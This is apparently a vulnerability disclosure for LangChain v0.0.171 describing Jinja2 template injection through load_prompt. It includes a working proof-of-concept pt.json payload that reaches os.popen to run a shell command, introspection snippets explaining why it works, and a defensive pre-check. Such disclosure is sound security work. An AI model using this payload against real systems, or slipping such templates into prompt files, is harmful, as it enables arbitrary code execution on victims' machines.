Version: v0.0.171
LangChain can load a serialized prompt from a JSON file:
from langchain.prompts import load_prompt

loaded_prompt = load_prompt("pt.json")
# Any payload embedded in the template executes when the prompt is formatted:
loaded_prompt.format(prompt="What is 1 + 1?")
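As a sketch of the file format (assuming the serialized-prompt schema shown in this report), a benign pt.json for the snippet above can be generated with the standard library:

```python
import json

# Sketch of the serialized prompt file that load_prompt("pt.json") reads.
# Benign template; field names mirror the JSON shown later in this report.
prompt_spec = {
    "input_variables": ["prompt"],
    "output_parser": None,
    "partial_variables": {},
    "template": "Tell me a {{ prompt }}",
    "template_format": "jinja2",
    "validate_template": True,
    "_type": "prompt",
}

with open("pt.json", "w") as f:
    json.dump(prompt_spec, f, indent=2)
```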
load_prompt supports Jinja2 templates (template_format: "jinja2") and renders them with the standard, unsandboxed Jinja2 engine. If the loaded JSON file contains a malicious Jinja2 payload, template injection is triggered when the prompt is rendered, as with the following pt.json:
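The root cause is that Jinja2 evaluates arbitrary expressions inside {{ }} blocks rather than performing plain variable substitution. A minimal sketch, assuming only that the jinja2 package is installed (LangChain itself is not needed to see the behavior):

```python
from jinja2 import Template

# Plain variable substitution, as a prompt template intends:
print(Template("Tell me a {{ prompt }}").render(prompt="joke"))  # Tell me a joke

# But {{ }} is a full expression language: this evaluates to 49,
# and the same mechanism lets a payload walk Python's object model.
print(Template("{{ 7 * 7 }}").render())  # 49
```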
{
  "input_variables": [
    "prompt"
  ],
  "output_parser": null,
  "partial_variables": {},
  "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
  "template_format": "jinja2",
  "validate_template": true,
  "_type": "prompt"
}
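Why the payload works: Python's introspection lets any string object reach os.popen. The hard-coded index [147] is just the position of os._wrap_close in the subclass list and varies across Python builds, so this sketch (plain CPython, no LangChain or Jinja2 required) locates the class by name instead:

```python
# Walk from str -> object -> all loaded classes, exactly as the template
# payload does. os is imported at interpreter startup, and os._wrap_close's
# __init__ was defined in the os module, so its __globals__ exposes popen.
subclasses = ''.__class__.__bases__[0].__subclasses__()
wrap_close = next(c for c in subclasses if c.__name__ == '_wrap_close')
popen = wrap_close.__init__.__globals__['popen']

# Equivalent to the payload's popen('dir'); a harmless command here.
print(popen('echo injected').read().strip())
```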
This vulnerability allows arbitrary code execution: anyone who loads and formats a prompt file from an untrusted source runs attacker-controlled commands on their own machine.
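A defensive sketch on the caller's side (a hypothetical helper, not part of LangChain): inspect the file before handing it to load_prompt and refuse Jinja2 templates, since f-string templates only substitute variables and cannot execute code. Rendering with jinja2.sandbox.SandboxedEnvironment is another option when Jinja2 features are genuinely needed.

```python
import json

def is_safe_prompt_file(path):
    """Hypothetical pre-check: reject serialized prompts that request the
    jinja2 engine. "f-string" (the default) cannot run arbitrary code."""
    with open(path) as f:
        spec = json.load(f)
    return spec.get("template_format", "f-string") == "f-string"

# Usage: only call load_prompt(path) when is_safe_prompt_file(path) is True.
```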